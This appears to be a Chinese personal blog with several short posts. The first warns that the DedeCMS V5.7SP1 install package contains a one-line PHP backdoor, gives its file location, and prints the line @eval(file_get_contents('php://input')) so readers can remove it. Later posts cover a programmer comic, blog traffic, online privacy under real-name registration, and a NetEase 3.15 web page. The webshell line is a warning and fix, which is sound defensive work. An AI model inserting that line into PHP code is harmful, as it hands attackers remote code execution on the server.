织梦内容管理系统一直以方便快捷强大而著称,但是这次..就连官网也受到影响…
最新消息,其实我是在微博上看到有人发布了这个消息。
织梦V5.7SP1版本安装包内被人植入了一句话木马。
我自己亲自去测试了一下,果真,被人植入了一句话木马。
所幸的事,我管理的两个网站并没有被植入(是因为之前早些日子被下载的原因吧!)
木马位置在uploads->include->shopcar.class.php文件中的第32行。
连官网都被日了- -最近下载了织梦并且传上服务器的朋友,要小心了。。
修复方案:删除@eval(file_get_contents(‘php://input’)),以及针对服务器进行全面的扫描杀毒。
其实这个是很早就发现有的一个bug。
可能很多人都知道,也有人说,这个没什么大碍,发布了也没意义。
在我看来不是这样的,既然他本身要积分,那么就是对共享资料者的一种知识产权的尊重。
如是说来,还是要针对这个漏洞进行上报。
目前已经提交给@乌云处理。
这是一个在新浪微博看到程序员漫画,看完觉得挺有意思的。
谨记:写程序还是那句话,不要太在乎细节,否则只会让你陷入死循环:)
文中的那句话还是很值得大家思考的:
根据用途,每种程序都有适当的复杂级别,如果你无法判断,过度努力,只会比低于这种级别更不专业。
(不过个人觉得这句话应该是翻译过来的)
我觉得理解为:每种程序都有适当的复杂级别,如果你无法判断,太过拼命,你只会在做徒劳之功。更为恰当。
在昨天,发布了网易的那篇文章之后,我的博客流量大增- -。
直接去了20IP+了,表示感到很欣慰,开这个wordpress到现在为止,没有上过15的。。。能上20很开心了。
原本只想着能分享也是一种快乐,但这次给了我很大的鼓舞。
话又说回来了,明天是实名制的第一天,不知道各位有没什么感想呢?
我个人分享下我的感觉。实名制在如今试用期间,必定出现N++的问题(各种不解释,想知道的问百度)。
我本人也测试了一下,利用搜索引擎来搜索信息,几乎很轻易的就获取了N个人的身份证、手机号、学号、工号等等。
更不要说以后的实名制了,在如今未实名制的情况下都如此糟糕,可想而知,未来是多么的糟糕。
建议各位以后还是考虑下隐私问题吧。。非必要的情况下,请勿把重要个人信息填写在网上,以免被脱裤之后的各种麻烦。。
最好的例子不过是CSDN程序员网站被人脱裤的悲剧了。
还是那句话,安全无小事,注重自身安全,防范于未然。
开场:先扯几句,白色情人节阿,各种囧啊,神马b的短裙,两会神马的最没爱了。
明天就是3.15,但是网易却在今天发布了一个网页:题目为315我们这儿良心企业盘点,正文看似为空白,实际上.(按ctrl+a)..激情无限啊。。
看过那么多个性的,没看过这么个性的。特别是网易这样在这个关键的时候。。。
不过也通过这件事,突出了国内,确实缺德商家、企业数不胜数。。
本人猜想,网易也许是想通过这次来表达他独树一格的立场,不管怎么样也好,网易这次的做法是深受人心了。
至少网易的编辑这次的做法非常给力。
即使我本人不用网易微博,但是我仍然支持这样的企业。
一个企业,品质最重要,否则像三鹿,蒙牛。。只会遭到别人的唾骂。